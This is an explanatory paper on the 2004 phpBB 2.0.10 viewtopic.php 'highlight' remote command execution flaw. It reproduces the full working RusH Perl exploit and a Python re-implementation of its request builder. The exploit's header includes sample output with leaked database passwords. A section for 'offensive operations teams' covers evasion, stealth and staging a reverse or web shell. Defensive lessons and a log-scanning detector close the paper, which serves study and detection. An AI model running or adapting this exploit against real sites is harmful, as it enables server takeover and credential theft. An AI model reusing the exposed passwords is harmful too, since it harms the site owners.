phpBB 2.0.10 Remote Command Execution Exploit Explained

What this paper is
This paper details a remote command execution vulnerability in phpBB 2.0.10 and earlier (the `highlight` parameter of viewtopic.php, later catalogued as CVE-2004-1315) and walks through the public Perl exploit for it. The script injects a PHP expression through the search-highlighting code so that the web server runs an arbitrary shell command and returns its output inside the topic page. It was published by RusH Security Team in November 2004.
Simple technical breakdown
The vulnerable code is in viewtopic.php, not search.php: search.php only produces result links of the form viewtopic.php?t=<id>&highlight=<words>, and viewtopic.php does the actual highlighting. It takes the `highlight` parameter, calls `urldecode()` on it even though the web server has already decoded the query string once, splits it into words and splices them into a PHP expression that `preg_replace()` evaluates with the `/e` modifier while rendering each post of the topic. Because that extra `urldecode()` runs after phpBB's input escaping (magic_quotes_gpc or its own addslashes pass), a double-encoded quote (`%2527`) reaches the expression as a bare `'`, closes the string literal it sits in, and turns the rest of the parameter into executable PHP.
The exploit sends a single crafted HTTP GET request to the target's viewtopic.php. The request carries:
- A valid topic ID (`t=`): the highlighting code only runs while the posts of an existing topic are rendered, so the topic must exist and contain at least one post.
- The command in a parameter of the attacker's own choosing (`rush=`): the shell line to run, percent-encoded byte by byte and wrapped in `echo _START_;` and `; echo _END_`.
- The PHP payload in the `highlight` parameter: a double-encoded string that, once phpBB has decoded it a second time, reads `'.passthru($HTTP_GET_VARS[rush]).'` and is evaluated as PHP.
The script then reads the response line by line and prints whatever lies between the `_START_` and `_END_` markers, which is the command's output.
Complete code and payload walkthrough
The provided Perl script r57phpbb2010.pl is the exploit. Let's break it down:
#!/usr/bin/perl
use IO::Socket;
## @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@
## @@! @@@ @@! @@@ !@@ @@! @@@
## @!@!!@! @!@ !@! !@@!! @!@!@!@!
## !!: :!! !!: !!! !:! !!: !!!
## : : : :.:: : ::.: : : : :
##
## phpBB <= 2.0.10 remote commands exec exploit
## based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example...
## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
## The third issue, search highlighting, has been checked by us several times and we can do
## nothing with it at all. Again, that particular group admit likewise. In a future release
## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our
## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to
## be cause for an immediate release.
## heh...
##
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
## *** CMD: [ ls -la ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## total 507
## drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 .
## drwxrwxr-x 19 root phpbb 1112 Nov 12 15:08 ..
## drwxr-xr-x 2 dhn phpbb 152 Oct 13 18:23 CVS
## drwxr-xr-x 3 dhn phpbb 944 Jul 19 15:17 admin
## drwxrwxrwx 5 dhn phpbb 160 Aug 14 21:19 cache
## -rw-r--r-- 1 dhn phpbb 44413 Mar 11 2004 catdb.php
## -rw-r--r-- 1 dhn phpbb 5798 Jul 19 15:17 common.php
## -rw-r--r-- 1 root root 264 Jul 2 08:05 config.php
## drwxr-xr-x 3 dhn phpbb 136 Jun 24 06:40 db
## drwxr-xr-x 3 dhn phpbb 320 Jul 19 15:17 docs
## -rw-r--r-- 1 dhn phpbb 814 Oct 30 2003 extension.inc
## -rw-r--r-- 1 dhn phpbb 3646 Jul 10 04:21 faq.php
## drwxr-xr-x 2 dhn phpbb 96 Aug 12 14:59 files
## -rw-r--r-- 1 dhn phpbb 45642 Jul 12 12:42 groupcp.php
## drwxr-xr-x 7 dhn phpbb 240 Aug 12 16:22 images
## drwxr-xr-x 3 dhn phpbb 1048 Jul 19 15:17 includes
## -rw-r--r-- 1 dhn phpbb 14518 Jul 10 04:21 index.php
## drwxr-xr-x 60 dhn phpbb 2008 Sep 27 01:54 language
## -rw-r--r-- 1 dhn phpbb 7481 Jul 19 15:17 login.php
## -rw-r--r-- 1 dhn phpbb 12321 Mar 4 2004 memberlist.php
## -rw-r--r-- 1 dhn phpbb 37639 Jul 10 04:21 modcp.php
## -rw-r--r-- 1 dhn phpbb 45945 Mar 24 2004 mods_manager.php
## -rw-r--r-- 1 dhn phpbb 34447 Jul 10 04:21 posting.php
## -rw-r--r-- 1 dhn phpbb 72580 Jul 10 04:21 privmsg.php
## -rw-r--r-- 1 dhn phpbb 4190 Jul 12 12:42 profile.php
## -rw-r--r-- 1 dhn phpbb 16276 Oct 13 18:23 rules.php
## -rw-r--r-- 1 dhn phpbb 42694 Jul 19 15:17 search.php
## drwxr-xr-x 4 dhn phpbb 136 Jun 24 06:41 templates
## -rw-r--r-- 1 dhn phpbb 23151 Mar 13 2004 viewforum.php
## -rw-r--r-- 1 dhn phpbb 7237 Jul 10 04:21 viewonline.php
## -rw-r--r-- 1 dhn phpbb 45151 Jul 10 04:21 viewtopic.php
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
## *** CMD: [ cat config.php ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## $dbms = "mysql";
## $dbhost = "localhost";
## $dbname = "phpbb";
## $dbuser = "phpbb";
## $dbpasswd = "phpBB_R0cKs";
## $table_prefix = "phpbb_";
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## rocksss....
##
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##
## fucking lamaz...
##
## ccteam.ru
## $dbname = "ccteam_phpbb2";
## $dbuser = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (@ARGV < 4)
{
print q(############################################################
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.void.ru
############################################################
usage:
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
############################################################
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];
$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
$on = 0;
while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}
print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
### EOF ###

| Code Fragment/Block | Practical Purpose |
|---|---|
| `#!/usr/bin/perl` | Shebang line: the script is executed with Perl. |
| `use IO::Socket;` | Imports IO::Socket, used to open the raw TCP connection over which the HTTP request is written. |
| `if (@ARGV < 4)` block | Checks that all four arguments (URL, DIR, NUM, CMD) were supplied; otherwise prints usage and exits. |
| `$serv = $ARGV[0];` | Target host. |
| `$dir = $ARGV[1];` | Directory where phpBB is installed (e.g. `/phpBB/` or `/`). |
| `$topic = $ARGV[2];` | ID of an existing topic. |
| `$cmd = $ARGV[3];` | Shell command to run on the server. |
| `$serv =~ s/(http:\/\/)//eg;` | Strips a leading `http://` so `$serv` is a bare hostname usable for the socket and the Host header. |
| `print "*** CMD: [ $cmd ]\r\n";` | Echoes the command for user feedback. |
| `print "~~~...~~~\r\n";` | Separator line. |
| `$cmd=~ s/(.*);$/$1/eg;` | Drops one trailing semicolon from the command. The command is later followed by `; echo _END_`, so a trailing `;` would produce `;;`, which the shell rejects as a syntax error. |
| `$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;` | Percent-encodes every byte of the command: `ord` gives the byte value, `sprintf("%2.2x")` formats it as two hex digits, `uc` upper-cases them and `%` is prefixed. Every character is encoded, not only reserved ones, so spaces, quotes and shell metacharacters travel safely in the query string. |
| `$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;` | The same per-byte encoding applied to the topic ID. Topic IDs are numeric, so this changes nothing functionally; it is simply the same encoder reused. |
| `$path = $dir;` | Starts the request path with the install directory. |
| `$path .= 'viewtopic.php?t=';` | Appends the vulnerable script and the topic parameter. |
| `$path .= $topic;` | Appends the encoded topic ID. |
| `$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';` | Adds the `rush` parameter, which carries the shell line; this prefix decodes to `echo _START_; ` (see below). |
| `$path .= $cmd;` | Appends the encoded user command to `rush`. |
| `$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';` | Appends `; echo _END_` to `rush`. |
| `$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';` | Adds the `highlight` parameter carrying the PHP payload that calls `passthru($HTTP_GET_VARS[rush])` (decoded below). |
| `$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") \|\| die "[-] CONNECT FAILED\r\n";` | Opens a plain TCP connection to port 80 on the target; aborts if it fails. |
| `print $socket "GET $path HTTP/1.1\n";` | Sends the request line with the crafted path. |
| `print $socket "Host: $serv\n";` | Host header, mandatory for HTTP/1.1 and needed for name-based virtual hosts. |
| `print $socket "Accept: */*\n";` | Accept header. |
| `print $socket "Connection: close\n\n";` | Asks the server to close after the response; the blank line terminates the headers. |
| `$on = 0;` | Flag controlling whether response lines are printed. |
| `while ($answer = <$socket>)` | Reads the response line by line. |
| `if ($answer =~ /^_END_/) { print "~~~...\r\n"; exit(); }` | A line beginning with `_END_` marks the end of the command output: print the separator and exit. |
| `if ($on == 1) { print " $answer"; }` | While inside the markers, print each line prefixed with a space. |
| `if ($answer =~ /^_START_/) { $on = 1; }` | A line beginning with `_START_` switches printing on. Because this check comes after the print, the marker line itself is not printed. |
| `print "[-] EXPLOIT FAILED\r\n";` | Reached only if the response ended without an `_END_` line. |
| `print "~~~...\r\n";` | Final separator. |

Decoding the `rush` parameter (`%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20` + encoded command + `%3B%20%65%63%68%6F%20%5F%45%4E%44%5F`):
- `%65%63%68%6F` -> `echo`
- `%20` -> space
- `%5F%53%54%41%52%54%5F%3B%20` -> `_START_; `
- the encoded command -> the user's command
- `%3B%20%65%63%68%6F%20%5F%45%4E%44%5F` -> `; echo _END_`
Decoded, `rush` is the shell line `echo _START_; <command>; echo _END_`. It is never interpreted by PHP: PHP merely hands it to `passthru()`, which runs it through the system shell. The two `echo`s bracket the command output so the Perl script can find it inside the HTML response.

Decoding the `highlight` parameter (`%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527`):
- `%2527` -> `%27` after the web server's decode -> `'` after phpBB's own `urldecode()`
- `.` -> literal dot (PHP string concatenation)
- `%70%61%73%73%74%68%72%75` -> `passthru`
- `%28` -> `(`
- `%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D` -> `$HTTP_GET_VARS[rush]` (the PHP 4 long array; `$_GET` is the modern equivalent, and phpBB 2.0.x itself uses the long arrays throughout)
- `%29` -> `)`
- `.` -> literal dot
- `%2527` -> `%27` -> `'`
Fully decoded, `highlight` is `'.passthru($HTTP_GET_VARS[rush]).'`. The quotes are double-encoded on purpose: the web server decodes `%2527` to `%27`, which contains no quote character, so phpBB's input escaping (magic_quotes_gpc or its own addslashes pass) leaves it alone; only afterwards does viewtopic.php call `urldecode()` on the value and produce a bare `'`. The highlight words are spliced into a PHP expression that `preg_replace()` evaluates under the `/e` modifier, inside a single-quoted string literal. The leading `'` closes that literal, `.passthru(...)` is concatenated as code, and the trailing `'` reopens the literal so the expression stays syntactically valid. `rush` is written as an unquoted array key so the payload needs no further quote characters; PHP treats the bare word as the string `'rush'` (with a notice).
Mapping of Code Fragments to Practical Purpose:
- Argument parsing (`if (@ARGV < 4)`): ensures the four arguments are present.
- Variable assignment (`$serv`, `$dir`, `$topic`, `$cmd`): collects target information.
- URL encoding (`$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;`): percent-encodes the command and topic byte by byte for the query string.
- Path construction (`$path = $dir; ...`): builds the malicious URL.
  - `&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20`: start delimiter for output capture (`echo _START_; `).
  - `$path .= $cmd;`: the command itself.
  - `%3B%20%65%63%68%6F%20%5F%45%4E%44%5F`: end delimiter (`; echo _END_`).
  - `&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527`: the core payload; it makes phpBB call `passthru()` on the `rush` parameter, and the command output lands between the `_START_` and `_END_` markers.
- Socket connection (`IO::Socket::INET->new(...)`): TCP connection to the web server on port 80.
- HTTP request (`print $socket "GET $path HTTP/1.1\n"; ...`): sends the crafted request.
- Response parsing (`while ($answer = <$socket>) ...`): reads the reply and extracts the command output.
- Output delimiters (`_START_`, `_END_`): isolate the command output from the rest of the HTML.
Shellcode/Payload Segments:
There is no shellcode here. The "payload" is the crafted query string; execution happens on the server because phpBB evaluates part of it as PHP.
The PHP injected through the `highlight` parameter is: `'.passthru($HTTP_GET_VARS[rush]).'`
- `$HTTP_GET_VARS[rush]`: reads the `rush` GET parameter of the same request, which carries the shell line `echo _START_; <command>; echo _END_`.
- `passthru(...)`: runs that line through the system shell and writes the program's raw output straight into the HTTP response.
- `.` (concatenation) and the surrounding `'` characters: they splice the call into the string expression phpBB is already evaluating, closing the existing single-quoted literal before the call and reopening it afterwards so the expression remains valid PHP.
Splitting the exploit across two parameters is deliberate: `highlight` has to survive phpBB's decoding and escaping and is kept short and free of further quote characters, while `rush` is an ordinary GET parameter that PHP never inspects, so the command can contain anything. The `echo _START_;` and `; echo _END_` wrappers live in `rush` and are executed by the shell; they exist only so the Perl script can locate the command output inside the HTML page.
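To make the encoding and the response parsing concrete, here is a Python re-implementation of the script's request builder and read loop. This is an added example, not part of the RusH exploit or of the original page. It builds the same path the Perl code builds, shows the two decoding layers the `highlight` parameter depends on (the `phpbb_view_of` helper emulates phpBB's quote escaping followed by the extra `urldecode()`; it is a model, not phpBB's code), and extracts output from a constructed response body. Nothing is sent over the network.

```python
from typing import List, Optional
from urllib.parse import unquote

START_MARK = "_START_"
END_MARK = "_END_"

# The PHP expression the exploit smuggles in through highlight=, before encoding.
HIGHLIGHT_PAYLOAD = "'.passthru($HTTP_GET_VARS[rush]).'"


def pct_encode_all(s: str) -> str:
    """Percent-encode every byte as upper-case %XX, like the Perl
    s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg substitution."""
    return "".join("%%%02X" % b for b in s.encode("latin-1"))


def encode_highlight(php_expr: str) -> str:
    """Encode the highlight payload the way the script does: single quotes are
    double-encoded (%2527) so that one decode by the web server leaves %27, which
    carries no quote character past phpBB's input escaping; dots stay literal;
    everything else is encoded once."""
    pieces = []
    for ch in php_expr:
        if ch == "'":
            pieces.append("%2527")
        elif ch == ".":
            pieces.append(".")
        else:
            pieces.append(pct_encode_all(ch))
    return "".join(pieces)


def build_path(install_dir: str, topic: str, cmd: str) -> str:
    """Build the request path exactly as r57phpbb2010.pl does."""
    if cmd.endswith(";"):          # Perl: $cmd =~ s/(.*);$/$1/  (avoids 'cmd;; echo _END_')
        cmd = cmd[:-1]
    rush = f"echo {START_MARK}; {cmd}; echo {END_MARK}"
    return (f"{install_dir}viewtopic.php?t={pct_encode_all(topic)}"
            f"&rush={pct_encode_all(rush)}"
            f"&highlight={encode_highlight(HIGHLIGHT_PAYLOAD)}")


def decode_layers(value: str) -> List[str]:
    """[as sent, after the web server's decode, after viewtopic.php's urldecode()]."""
    once = unquote(value)
    return [value, once, unquote(once)]


def phpbb_view_of(server_decoded: str) -> str:
    """Model of what viewtopic.php ends up with (assumption, not phpBB's code):
    phpBB (or magic_quotes_gpc) backslash-escapes quotes in every GET value first;
    only afterwards does viewtopic.php call urldecode() on highlight."""
    slashed = (server_decoded.replace("\\", "\\\\")
                             .replace("'", "\\'")
                             .replace('"', '\\"'))
    return unquote(slashed)


def extract_output(body: str) -> Optional[List[str]]:
    """Mirror the Perl read loop: printing starts after a line beginning with
    _START_ and stops at a line beginning with _END_; None means no _END_ line
    arrived, which the script reports as EXPLOIT FAILED."""
    on = False
    collected: List[str] = []
    for line in body.splitlines():
        if line.startswith(END_MARK):
            return collected
        if on:
            collected.append(line)
        if line.startswith(START_MARK):
            on = True
    return None


# Constructed response: what a vulnerable board might return for "ls -la"
# (HTML trimmed; the command output sits where the highlighting code ran).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<html><body>\n"
    "_START_\n"
    "total 507\n"
    "drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 .\n"
    "-rw-r--r-- 1 root root 264 Jul 2 08:05 config.php\n"
    "_END_\n"
    "<div>rest of the topic page</div>\n"
)

if __name__ == "__main__":
    path = build_path("/phpBB/", "239819", "ls -la")
    print("GET", path)
    for stage, value in zip(("sent", "web server", "phpBB urldecode"),
                            decode_layers(path.split("highlight=")[1])):
        print(f"{stage:>16}: {value}")
    print("single-encoded quote would survive only as:",
          phpbb_view_of("'.passthru($HTTP_GET_VARS[rush]).'"))
    for line in extract_output(SAMPLE_RESPONSE) or ["EXPLOIT FAILED"]:
        print(" " + line)
```

Running it prints the same `rush=` and `highlight=` strings that appear in the Perl source, then the three decoding stages of `highlight`. The `phpbb_view_of` call with a single-encoded quote shows why the double encoding is needed: a `'` that the web server has already decoded is turned into `\'` by the input escaping and never breaks the string literal, whereas `%27` passes the escaping untouched and only becomes `'` in phpBB's second decode.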
Practical details for offensive operations teams
- Required Access Level: network access to the target web server on port 80. No authentication is needed; viewtopic.php and its `highlight` parameter are reachable by anyone who can view the topic. The script hard-codes port 80 and a plain TCP socket, so an HTTPS-only target needs the socket code changed.
- Lab Preconditions:
  - A vulnerable phpBB installation (2.0.10 or earlier) on a PHP version of the same era. phpBB 2.0.x itself reads `$HTTP_GET_VARS` everywhere, so any board that runs at all has the long arrays the payload relies on.
  - At least one topic with at least one post: the highlight code only runs while posts are rendered, so an empty or non-existent topic never reaches the vulnerable code.
  - A Perl interpreter with IO::Socket (part of the core distribution) on the attacking machine, and network connectivity to the target.
- Tooling Assumptions:
  - Perl interpreter.
  - Basic network tools (netcat or telnet) for sending the request by hand when debugging.
  - A web browser for reconnaissance: confirm the install directory, pick a topic ID, and check the version (the docs/ directory, if left in place, contains the changelog).
- Execution Pitfalls:
  - Incorrect URL/Directory: `[URL]` must be a bare hostname (the script only strips `http://`) and `[DIR]` must be the install path ending in a slash, because the script concatenates it directly with `viewtopic.php`.
  - Invalid Topic Number: `[NUM]` must be an existing topic with posts; otherwise phpBB returns its "topic does not exist" page and nothing is evaluated.
  - Firewall/WAF Evasion: the request is a single HTTP GET, but the query string is distinctive: every byte of `rush` is percent-encoded, the `highlight` value contains `%2527`, and its decoded form contains `passthru(`. A WAF with generic PHP-injection or double-encoding rules will flag it.
  - PHP Version/Configuration: if `passthru()` is listed in `disable_functions`, the injected PHP still runs but the command does not, and the markers never appear; another execution function would have to be substituted in the `highlight` payload.
  - Output Parsing: the script matches `/^_START_/` and `/^_END_/`, so both markers must begin a line in the response body. The shell's `echo` terminates each with a newline, but whatever phpBB emitted immediately before the payload ran must also end with a newline, or `_START_` lands mid-line and the script reports failure even though the command executed. When debugging, dump the raw response rather than relying on the markers.
  - Command Execution Restrictions: commands run as the web server user (`www-data`, `apache`, `nobody`), with that user's filesystem and network permissions only.
- Tradecraft Considerations:
  - Reconnaissance: identify the install directory and a valid topic ID by browsing; the exploit needs both.
  - Stealth: the request leaves an obvious entry in the web server access log (a GET request line containing `rush=` and `highlight=%2527`). There is no POST variant: the vulnerable code reads `$HTTP_GET_VARS`.
  - Payload Delivery: the command is embedded directly in the URL; a typical first command fetches and runs a more capable stage (reverse shell, web shell) so that later interaction does not go through the query string.
  - Post-Exploitation: privilege escalation, lateral movement or data access as the engagement requires. `config.php`, readable by the web server user by design, holds the database credentials, as the author's own sample output shows.
- Likely Failure Points:
  - Target is not running a vulnerable version (2.0.11 or later).
  - `passthru()` disabled in the server's PHP configuration.
  - Network filtering or a WAF blocking the request.
  - Incorrect target parameters (URL, DIR, NUM).
  - `_START_` or `_END_` not at the start of a line in the response.
Where this was used and when
This exploit was published in November 2004. It targeted phpBB versions 2.0.10 and earlier. Exploits of this nature were common in the early to mid-2000s as web applications matured and vulnerabilities in popular platforms like phpBB were discovered and weaponized. The author mentions successful testing on versions 2.0.6, 2.0.8, 2.0.9, and 2.0.10. The context provided in the paper suggests it was released shortly after the phpBB.com website itself was defaced, indicating a period of active exploitation and public disclosure of vulnerabilities.
Defensive lessons for modern teams
- Patch Management: keep web applications and their platform updated. This issue was fixed in phpBB 2.0.11, released shortly after the public exploit; the phpBB forum reply quoted in the script header shows the cost of deferring a fix for a bug believed to be unexploitable.
- Input Validation and Decoding: decode input exactly once, at the boundary. The vulnerable code called `urldecode()` on a value the web server had already decoded, after the input-escaping layer had run, which is why a double-encoded `%2527` arrived as a bare quote. Escaping that assumes the input will never be transformed again is not a defence.
- Secure Coding Practices: never evaluate user-derived strings as code. Here the string reached `preg_replace()` with the `/e` modifier, which is `eval()` by another name; the modifier was deprecated in PHP 5.5 and removed in PHP 7 for exactly this reason. Functions such as `passthru()`, `exec()`, `shell_exec()`, `system()` and `popen()` should be disabled in production PHP (`disable_functions`) unless a specific need exists, and then called only with allow-listed arguments.
- Web Application Firewalls (WAFs): this request has clear signatures (double-encoded quotes, PHP function names followed by parentheses in a query parameter), so a WAF can block the published exploit; encodings and the function used vary between variants, so treat a WAF as a compensating control, not a fix.
- Principle of Least Privilege: run the web server as an unprivileged user with write access limited to what the application needs (phpBB needs a writable `cache/` directory, as the author's listing shows; it does not need write access to its own code).
- Regular Security Audits and Code Reviews: a grep-level review for `eval()`, `preg_replace()` with `/e` and repeated decoding of request data finds this class of bug cheaply; the phpBB team had been told about the highlighting issue and had dismissed it as unexploitable.
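For detection teams, the following Python script is an added example (not part of the original page or of phpBB) that scans web server access log lines for this attack pattern. It looks only at requests to viewtopic.php, double-decodes the `highlight` parameter the way the vulnerable code did, and flags a value that then contains a quote next to a PHP execution call, or a quote that is still percent-encoded after the web server's single decode. The log lines are constructed: a normal search, the RusH request, a constructed variant of the same injection that uses `system()` and double-encoded dots (to show the detector does not key on the exact RusH string), an unrelated search.php hit and a legitimate highlight with a single-encoded apostrophe.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Combined log format: ip ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# PHP calls worth flagging when they appear, after double decoding, next to a quote.
CALL_RE = re.compile(
    r"\b(passthru|system|exec|shell_exec|popen|proc_open|eval|assert)\s*\(", re.I)

# A %27 / %22 still encoded after the web server's single decode can only become a
# quote if the application decodes a second time (which viewtopic.php did).
QUOTE_STILL_ENCODED = re.compile(r"%2[27]", re.I)


def analyse_target(target: str) -> Optional[str]:
    """Return a reason string if the request looks like the highlight exploit, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/viewtopic.php"):
        return None
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if name != "highlight":
            continue
        once = unquote(raw)      # what the web server hands to PHP
        twice = unquote(once)    # what viewtopic.php's extra urldecode() yields
        if "'" in twice and CALL_RE.search(twice):
            return f"quote + PHP call after double decode: {twice}"
        if QUOTE_STILL_ENCODED.search(once):
            return f"double-encoded quote in highlight: {once}"
    return None


def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client ip, timestamp, reason) for every suspicious request line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = analyse_target(m.group("target"))
        if reason:
            hits.append((m.group("ip"), m.group("ts"), reason))
    return hits


# Constructed sample log lines (addresses from the documentation ranges).
LOG_LINES = [
    '203.0.113.5 - - [22/Nov/2004:10:15:01 +0000] "GET /phpBB/viewtopic.php?t=239819&highlight=phpbb+security HTTP/1.1" 200 18233',
    '203.0.113.9 - - [22/Nov/2004:10:15:07 +0000] "GET /phpBB/viewtopic.php?t=239819&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%6C%73%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 19876',
    '198.51.100.7 - - [22/Nov/2004:10:16:44 +0000] "GET /phpBB/viewtopic.php?t=12&highlight=%2527%252esystem(chr(108)%252echr(115))%252e%2527 HTTP/1.1" 200 17001',
    '198.51.100.8 - - [22/Nov/2004:10:17:02 +0000] "GET /phpBB/search.php?search_keywords=highlight HTTP/1.1" 200 8812',
    '203.0.113.5 - - [22/Nov/2004:10:18:30 +0000] "GET /phpBB/viewtopic.php?t=5&highlight=it%27s+here HTTP/1.1" 200 16002',
]

if __name__ == "__main__":
    for ip, ts, reason in scan_log(LOG_LINES):
        print(f"{ts} {ip} {reason}")
```

The two-stage decode is the important design choice: matching the raw request line for the literal RusH string would miss the `system()` variant, and matching after a single decode would not reveal the quote at all, because the whole point of `%2527` is that one decode leaves it harmless-looking. Decoding twice reproduces what the vulnerable application saw, and the legitimate `it%27s` search is not flagged because after both decodes it contains a quote but no call.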
ASCII visual (if applicable)
The exploit is a single HTTP request/response exchange. Steps are numbered in the order they happen:

  Attacker (r57phpbb2010.pl)                      Target (vulnerable phpBB 2.0.10)
  ------------------------------                  ------------------------------------
  1. Build path:
     /phpBB/viewtopic.php?t=<NUM>
        &rush=<echo _START_; CMD; echo _END_>
        &highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527
  2. GET <path> HTTP/1.1  ------------------------->
                                                   3. Web server decodes the query once:
                                                      highlight = %27.passthru(...).%27
                                                      (no quote yet, so input escaping
                                                      leaves it alone)
                                                   4. viewtopic.php calls urldecode() again:
                                                      highlight = '.passthru(...).'
                                                   5. preg_replace() with /e evaluates the
                                                      expression containing that string
                                                      while rendering the topic's posts
                                                   6. passthru() runs the shell line from
                                                      rush; its stdout goes straight into
                                                      the response body
  7. <-------------------------  HTTP/1.1 200 OK
     ...topic HTML...
     _START_
     <command output>
     _END_
     ...rest of the page...
  8. Read lines: printing starts after a line
     beginning with _START_ and stops at the
     line beginning with _END_.

Explanation:
- The attacker sends one crafted HTTP GET request.
- The web server decodes the query string once; phpBB's input escaping sees `%27`, not a quote.
- viewtopic.php decodes `highlight` a second time, producing the bare quote, and its `preg_replace()` with the `/e` mod.ifier evaluates the resulting PHP, which calls `passthru()` on the `rush` parameter.
- The shell runs `echo _START_; <command>; echo _END_`, and the output is written into the page at the point where the highlighting ran.
- The script reads the response line by line and prints only the lines between the `_START_` and `_END_` markers.
Source references
- Exploit-DB paper: https://www.exploit-db.com/papers/647
- Original exploit code: r57phpbb2010.pl, reproduced in full above (milw0rm archive stamp 2004-11-22).
- SecurityFocus post cited in the script header: http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0 (may require an archive service to view).
Original Exploit-DB Content (Verbatim)
The verbatim listing is identical to the script reproduced in the walkthrough above; the archived copy ends with the stamp:
# milw0rm.com [2004-11-22]